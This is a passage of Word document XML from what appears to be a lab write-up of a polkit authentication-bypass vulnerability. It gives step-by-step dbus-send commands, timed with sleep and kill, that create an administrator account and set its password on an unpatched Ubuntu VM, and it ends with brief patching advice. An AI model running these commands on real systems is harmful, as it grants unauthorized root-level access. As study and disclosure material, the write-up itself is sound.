          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Demonstration of the Exploit in Action. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">*The link to the pre-setup VM image is in the Supplementary Materials section*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="930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9.436302142052"/>
        <w:gridCol w:w="2799.436302142052"/>
        <w:gridCol w:w="3701.127395715896"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2799.436302142052"/>
            <w:gridCol w:w="2799.436302142052"/>
            <w:gridCol w:w="3701.12739571589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Account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sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Standard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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">user1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6"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">userpass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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin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sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ubuntu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6"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in to user1 account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable the authentication dialog in the terminal. To ensure that we can terminate any process timely, disable the popout authentication by using ssh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ssh localhost</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5462588" cy="1759760"/>
            <wp:effectExtent b="0" l="0" r="0" t="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62588" cy="175976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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find out the time required to process a request to create a new user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the code below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">time is used to display the time required to run the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dbus-send is used to send the request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A user with id </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and username of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New Admin Two</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be created</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user2 string:"New Admin Two" int32:1</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5643563" cy="1275228"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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643563" cy="1275228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After finding out the time required, we will need to terminate the command halfway through using the “sleep” and “kill” commands at the end to bypass the authentication</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, the time spent is 0.010s, so I need dbus-send to terminate the command after ~0.005 seconds (0.010/2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initiate the dbus-send and kill the process in the middle of execution. As the attack relies on precise timing, multiple tries may be required in this step with different milliseconds</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user2 string:"New Admin Two" int32:1 &amp; sleep 0.005s ; kill $!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if a new user is created, else continue to repeat step 4 with different milliseconds before termination.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id user2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5810250" cy="869356"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="14" name="image13.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image13.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect b="0" l="0" r="806" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5810250" cy="869356"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generate a hash password with openssl tool</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ openssl passwd -5 userpass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5543550" cy="552450"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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54355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5"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the password using the same method when creating an account</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$5$BfCVatBL1SCHb0UJ$L.2W8cFhorTN50/gnVk5Vzh832L77FFeXZ9PFUGs0Q2' string:newadmpass &amp; sleep 0.003s ; kill $!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check if a new user’s password is set, if it shows “Authentication failure”, repeat step 7</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ su - user2</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5762625" cy="1028700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="10" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image6.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="0" l="0" r="3044" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5762625"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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We are now logged in as user 2 in the terminal, we can also log out to log in to the new user account.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2757488" cy="2406879"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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2757488" cy="2406879"/>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1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ed730eh1tip" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>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rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ijl4898z16bp" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation and Prevention Strategies for the Exploit. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this is a serious vulnerability, it needs local access to the machine in order to exploit it. The vulnerability has been remediated in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">v0.119</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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">he mitigation to the vulnerability is simple, running the system update or downloading fixed packages or the latest versions from the Linux distribution will update the polkit version and solve the issue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this command to update the Polkit package on Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
